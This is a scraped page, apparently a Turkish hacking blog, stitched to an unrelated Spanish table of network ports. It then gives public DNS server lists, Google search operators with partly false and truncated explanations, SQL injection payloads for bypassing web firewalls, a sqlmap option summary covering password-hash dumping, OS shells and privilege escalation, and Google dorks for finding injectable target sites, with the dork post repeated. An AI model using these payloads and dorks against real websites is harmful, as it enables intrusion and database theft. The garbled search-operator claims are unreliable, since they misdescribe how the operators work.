7007 afs3-bos Proceso supervisor básico AFS
7008 afs3-update Actualizador servidor-a-servidor AFS
7009 afs3-rmtsys Servicio gestor de caché remoto AFS
9876 sd Sesión Director para conferencias de multidifusión IP
10080 amanda Servicios de respaldo Advanced Maryland Automatic Network Disk Archiver (Amanda)
11371 pgpkeyserver Servidor de llaves públicas Pretty Good Privacy (PGP) / GNU Privacy Guard (GPG)
11720 h323callsigalt Señal alterna de llamada H.323
13720 bprd Demonio de peticiones Veritas NetBackup (bprd)
13721 bpdbm Administrador de bases de datos Veritas NetBackup (bpdbm)
13722 bpjava-msvc Protocolo Veritas NetBackup Java / Protocolo Microsoft Visual C++ (MSVC)
13724 vnetd Utilidad de redes Veritas
13782 bpcd Veritas NetBackup
13783 vopied Demonio de autenticación Veritas VOPIE
22273 wnn6 [wnn4] Sistema de conversión Kana/Kanji[c]
26000 quake Servidores de juegos de múltiples jugadores Quake (y relacionados)
26208 wnn6-ds Servidor Wnn6 Kana/Kanji
33434 traceroute Herramienta de localización de rutas de red Traceroute
Puerto # / Capa Nombre Comentario
1/ddp rtmp Protocolo de administración de tablas de enrutamiento
2/ddp nbp Protocolo de enlace de nombres
4/ddp echo Protocolo Echo de AppleTalk
6/ddp zip Protocolo de información de zona
Puerto # / Capa Nombre Comentario
751 kerberos_master Autenticación Kerberos
752 passwd_server Servidor de contraseñas Kerberos (kpasswd)
754 krb5_prop Propagación de esclavos Kerberos v5
760 krbupdate [kreg] Registro Kerberos
1109 kpop Protocolo de oficina de correo Kerberos (KPOP)
2053 knetd De-multiplexor Kerberos
2105 eklogin Inicio de sesión remota encriptada Kerberos v5 (rlogin)
Puerto # / Capa Nombre Comentario
15/tcp netstat Network Status (netstat)
98/tcp linuxconf Herramienta de administración de Linux Linuxconf
106 poppassd Demonio de cambio de contraseñas del protocolo de oficina de correos (POPPASSD)
465/tcp smtps Protocolo simple de transferencia de correo sobre Capas Segura (SMTPS)
616/tcp gii Interfaz interactiva Gated (demonio de enrutamiento)
808 omirr [omirrd] Servicios de espejos de archivos Online Mirror (Omirr)
871/tcp supfileserv Servidor del Protocolo de actualización de software (SUP)
901/tcp swat Herramienta de administración Web de Samba (SWAT)
953 rndc Herramienta de configuración remota del Berkeley Internet Name Domain versión 9 (BIND 9)
1127/tcp supfiledbg Depuración del Protocolo de actualización de software (SUP)
1178/tcp skkserv Servidor de entrada de Japonés Simple Kana to Kanji (SKK)
1313/tcp xtel Sistema de información de texto French Minitel
1529/tcp support [prmsd, gnatsd] Sistema de seguimiento de errores GNATS
2003/tcp cfinger GNU Finger
2150 ninstall Servicio de instalación de redes
2988 afbackup Sistema de respaldo cliente-servidor afbackup
3128/tcp squid Caché proxy Web Squid
3455 prsvp Puerto RSVP
5432 postgres Base de datos PostgreSQL
4557/tcp fax Servicio de transmisión de FAX (servicio antiguo)
4559/tcp hylafax Protocolo cliente-servidor HylaFAX (nuevo servicio)
5232 sgi-dgl Biblioteca de gráficos distribuidos SGI
5354 noclog Demonio de conexión del centro de operaciones de redes NOCOL (noclogd)
5355 hostmon Monitoreo de host del centro de operaciones de redes NOCOL
5680/tcp canna Interfaz de entrada de caracteres Canna Japanese
6010/tcp x11-ssh-offset Offset del reenvío X11 de Shell seguro (SSH)
6667 ircd Demonio del Internet Relay Chat (ircd)
7100/tcp xfs Servidor de fuentes tipográficas de X (XFS)
7666/tcp tircproxy Servicio proxy Tircproxy IRC
8008 http-alt Protocolo de transferencia de hipertexto (HTTP) alterno
8080 webcache Servicio de caché del World Wide Web (WWW)
8081 tproxy Proxy transparente
9100/tcp jetdirect [laserjet, hplj] Servicio de impresión de redes Hewlett-Packard (HP) JetDirect
9359 mandelspawn [mandelbrot] Programa de spawning Parallel Mandelbrot para el Sistema X Window
10081 kamanda Servicio de respaldo Amanda sobre Kerberos
10082/tcp amandaidx Servidor de índices Amanda
10083/tcp amidxtape Servidor de cintas Amanda
20011 isdnlog Sistema de inicio de sesión de Red digital de servicios integrados (RDSI)
20012 vboxd Demonio RDSI voice box (vboxd)
22305/tcp wnn4_Kr Sistema de entrada kWnn Korean
22289/tcp wnn4_Cn Sistema de entradas cWnn Chinese
22321/tcp wnn4_Tw Sistema de entradas tWnn Chinese (Taiwan)
24554 binkp Demonio de correo Binkley TCP/IP Fidonet
27374 asp Protocolo de búsqueda de direcciones
60177 tfido Servicio de correo compatible Ifmail FidoNet
60179 fido Red de noticias y correo electrónico FidoNet
22 Ocak 2016 Cuma
Search Operators / GokBoruEfe
Noktalama ve semboller
Semboller : + , @ , $ ,#,",-,*,:
-----------
+ : Google Arama Motorunda Kan Grubu Araması Yapmak İçin Kullanılır
@ : Google Arama Motorunda Sosyal Etikerler İçin Kullanılır
$ : Google Arama Motorunda karşılaştırma İçin Kullanılır
# : Google Arama Motorunda Popüler Konuları Bulmak İçin Kulanılır
" : Google Arama Motorunda Sözcük Veya İfad
2015-2016 | DNS Adresleri | DNS Değiştirme
Google, DNS Ayarları:
8.8.8.8
8.8.4.4
Open, DNS Ayarları:
208.67.222.222
208.67.220.220
Norton, DNS Ayarları:
198.153.192.1
198.153.194.1
Uydunet, DNS Ayarları:
62.248.80.161
62.248.80.162
Dnsadvantage, DNS Ayarları:
156.154.70.1
156.154.71.1
ScrubIt, DNS Ayarları:
67.138.54.100
207.225.209.66
GTEI, DNS Ayarları:
4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5
4.2.2.6
Yandex, DNS Ayarları:
77.88.8.8
77.88.8.1
16 Ocak 2016 Cumartesi
SQL injection Bypass WAF part 1
1 : union select 1,2,3,4,5
2 : /**/union/**/select/**/1,2,3,4,5
3 . %0Aunion%0Aselect%0A1,2,3,4,5
4 .union(select(1),(2),(3),(4),(5))
SQLMAP Komutları //
sqlmap --help ile seçenekler görüntülenebilir.
- Target (Hedef) :
Bu seçeneklerden biri, kaynağın hedefe ulaşabilmesi için set edilmelidir.
- u, --url (URL) : Hedefin url adresi
- l LOGFILE : Burp veya Webscraper günlüklerinden hedefi araştır.
- g googledork : Google dork prosesinden dönen urlleri kullan.
- Request (İstek)
Hedef url’e nasıl bağlanacağının belirlenmesi için bu seçenekler kullanılır.
-- data = DATA : Veri dizisi POST aracılığı ile gönderilir. (manuel)
-- cookie=cookıe : Belirtilen HTTP Cookie başlığı gönder.
-- proxy = PROXY: Hedef url e bağlanırken belirtlilen HTTP Proxy’ i kullan.
-- auth-type = ... : HTTP kimlik doğrulama tipi (Basic, Digest veya NTLM)
-- user-agent = ... : Belirlilen HTTP User - Agent i kullan
- Injection (Enjeksiyon) :
Bu seçenekler test için hangi parametrelerin seçileceğini belirtir.
- p testparameter : Test edilebilir parametreler gir.
-- dbms= DBMS : Belirtilen veri tabanı yönetim sistemi için değerleri kullan.
-- os = OS : Belirtilen DBMS işletim sistemi için bu değeri zorla.
-- invalid-bignum : Geçersiz değerler için büyük numaraları kullan.
- Detection (Tespit)
Bu seçenekler tespit fazını özelleştirmek için kullanılır.
-- level = LEVEL: Test performansının seviyesini belirler. (1-5, default 1)
-- risk = RISK : Gerçekleştirilen testin riski (0-3, default 1)
-- string STRIN : Sorgu doğru olarak değerlendirildiği zaman stringi eşleştir.
-- technique = … : Test için SQL injection tekniği (default “BEUSTQ”)
- Enumeration (Bilgi Dökümü) :
Veri tabanı yönetimi, tabloların içerdiği veri ve yapıları hakkında bilgi
dökümü toplar. Ayrıca hazınladığınız SQL ifadelerini çalıştırabilirsiniz.
- a, -all : Tüm bilgileri al.
- b, --banner : DBMS banner bilgisini al.
-- users : DBMS kullanıcı bilgileri al.
-- passwords : Kullanıcı şifre haslerini al.
-- dbs : DBMS veri tabanlarını bul ve getir.
-- dump : Tüm DBMS veri tabanı tablolarının girdilerini getir.
- Operating system access (İşletim Sistemi erişimi)
Bu seçenekler DBMS altından işletim sistemine sızıldığında kullanılır.
-- os-shell : İşletim sisteminden shell istemi
-- priv-esc : Veri tabanı prosesi için kullanıcı yetki yükseltmesi.
- General (Genel) :
Bu seçenekler bazı genel çalışma parametrelerini ayarlamak için vardır.
-- batch : Asla kullanıcı girdisi sorma, varsayılan davranışları kullan.
- b, --banner : DBMS banner bilgisini al.
-- update : sqlmap i güncelleştir.
-- forms : Hedef url üzerinde uygulanacak test formları ve ayrıştırıcılar.
-- save : INI konfigrasyon dosyası için seçenekelri kaydet.
-- tor : Tor ağını kullanma.
- Miscellaneous ( Diğer Özellikler )
-- dependencies : sqlmap gerekliliklerini kontrol et.
-- beep : SQL injwction bulunduktan sonra beep sesi çıkar.
-- wizard : Yeni başlayanlar için arayüz sihirbazı.
PS : Tüm bu özellikler sqlmapin çok kullanılan özellikleridir. Tümü için --help.
14 Ocak 2016 Perşembe
Site Üzerinde "id=" Değeri Bulmak
Hedef Site Üzerinde Sql İnjection Aramak İçin İd Değerlerine Ulaşmanız Gerekmektedir...
Bunu İçin Öncelikle Kullanacağınız Komutları Bilmeniz Gerekmektedir..
Başlıca 2 Tane Komut Vardır Bunlar
1 - Site:hedef.org "id="
2 - site:hedef.org "you have an error in your sql syntax"
Bu Şekilde Arama Yaptıgınızda Sonuçları Göreceksiniz ..
GokBoruEfe//
---------------------
Bunu İçin Öncelikle Kullanacağınız Komutları Bilmeniz Gerekmektedir..
Başlıca 2 Tane Komut Vardır Bunlar
1 - Site:hedef.org "id="
2 - site:hedef.org "you have an error in your sql syntax"
Bu Şekilde Arama Yaptıgınızda Sonuçları Göreceksiniz ..
GokBoruEfe//
---------------------
10 Ocak 2016 Pazar
8 Ocak 2016 Cuma
3 Ocak 2016 Pazar
2 Ocak 2016 Cumartesi
Kaydol:
Kayıtlar (Atom)